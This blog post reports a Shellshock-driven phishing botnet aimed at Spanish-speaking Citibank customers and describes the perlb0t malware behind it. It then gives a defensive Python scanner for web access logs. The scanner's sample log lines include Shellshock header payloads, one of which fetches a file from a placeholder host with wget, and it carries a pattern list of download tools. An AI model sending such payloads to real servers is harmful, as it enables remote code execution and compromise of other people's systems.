As expected, Shellshock is being used for phishing attacks

"Phishing appeared to be the name of the game for these particular attackers, as it made up most of the malicious activity that we observed in the botnet. . . . The attackers commanded all of the infected hosts to reach out to a separate storage server containing PHP code used to build and send emails, as well as over 10 million email addresses.

The bots reported over 100,000 phishing emails sent. The emails attempted to phish Spanish-speaking Citibank users. The message, in Spanish, tells potential victims that their Citibank card has been deactivated for security reasons and can be reactivated at a link that they supply."

In the case observed by Lancope, the cybercriminals deployed code to compromise a vulnerable server and then commanded the server to download mailer scripts used to deploy the phishing emails. Figure 1 shows the script used to compromise the server. The mailer script was v0.5 of perlb0t, a.k.a. w0rmb0t or "LinuxNet perlbot" (see Figure 2). The bot, which was seen in attacks dating back to 2006, was written using Portuguese for variable names and for some literal strings such as error messages. It contains a port scanner, a simple command shell, and flooder (DDoS) subroutines, and it uses IRC for C2.

Figure 1. Code deployed to compromise vulnerable systems.

Figure 2. Perl code from the bot used to obtain email software and deploy phishing emails.

It's also interesting that the report mentions the botnet contains VoIP systems compromised via Shellshock, which isn't surprising considering they likely weren't at the top of the list of systems to patch for most organizations. That being said, the phone systems used in vishing and SMiShing attacks are often compromised VoIP servers.
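For defenders who want to check their own web servers for the compromise-then-download sequence described above, here is an added example (not code from this post or from the Lancope report) that scans access logs for the Bash function-definition prefix Shellshock relies on and notes whether a download command follows it. The log lines, addresses and host names are constructed, and the "combined" log format is an assumption.

```python
import re
from collections import namedtuple

# One quoted log field; backslash-escaped quotes inside it are allowed.
Q = r'"((?:[^"\\]|\\.)*)"'
# Assumed "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' \d{3} \S+ ' + Q + ' ' + Q)
# Bash function-definition prefix placed in a header value by Shellshock requests.
FUNC_DEF = re.compile(r'\(\)\s*\{')
# Tools commonly used to pull a second-stage script onto the host.
FETCH = re.compile(r'\b(?:wget|curl|lwp-download|fetch)\b')

Finding = namedtuple("Finding", "ip time field fetches_remote")

def scan(lines):
    """Return one Finding per log field that carries a function definition."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        ip, time, request, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        for field, value in fields:
            hit = FUNC_DEF.search(value)
            if hit:
                # Only text after the function definition is treated as a command.
                fetches = bool(FETCH.search(value, hit.end()))
                findings.append(Finding(ip, time, field, fetches))
    return findings

def summarize(findings):
    """Group findings by source address; flag sources that reached the download stage."""
    hosts = {}
    for f in findings:
        entry = hosts.setdefault(f.ip, {"hits": 0, "download_stage": False})
        entry["hits"] += 1
        entry["download_stage"] = entry["download_stage"] or f.fetches_remote
    return hosts

# Constructed sample lines (documentation addresses, placeholder host and path).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Oct/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; echo probe"',
    '203.0.113.9 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; wget http://host.example.invalid/PLACEHOLDER"',
    '192.0.2.44 - - [01/Oct/2014:10:02:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "() { :; }; echo probe" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in summarize(scan(SAMPLE_LOG)).items():
        print(ip, info)
```

A source flagged with `download_stage` is the one to prioritize: check the targeted host for unexpected Perl or PHP files and for outbound IRC connections.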